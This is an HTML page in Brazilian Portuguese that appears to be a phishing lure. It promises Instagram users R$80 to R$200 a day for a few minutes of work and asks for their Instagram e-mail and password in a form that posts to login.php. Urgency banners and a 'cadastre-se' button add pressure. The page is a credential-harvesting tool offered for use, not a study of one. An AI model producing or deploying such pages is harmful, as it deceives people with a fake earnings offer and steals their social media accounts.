<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Comece a Faturar Agora!</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="login-container">
        <h1>🚀 Comece a Faturar Agora! 🚀</h1>
        <p class="alert-text">⚠️ Apenas para usuários do Instagram! ⚠️</p>
        <p class="highlight-text">💰 Com apenas alguns minutos por dia, você pode faturar de <span class="dinheiro">R$ 80 a R$ 200</span>! 💰</p>

        <!-- Formulário de Login -->
        <form action="login.php" method="POST">
            <input type="text" name="email" placeholder="E-mail do Instagram" required>
            <input type="password" name="senha" placeholder="Senha do Instagram" required>
            <button type="submit">🔓 Entrar com Instagram</button>
        </form>

        <p class="highlight-text">🚀 NÃO PERCA ESSA OPORTUNIDADE! 🚀</p>

        <!-- Botão de Cadastro -->
        <a href="cadastro.html" class="btn-cadastro">📢 CADASTRE-SE AGORA!</a>
    </div>
</body>
</html>
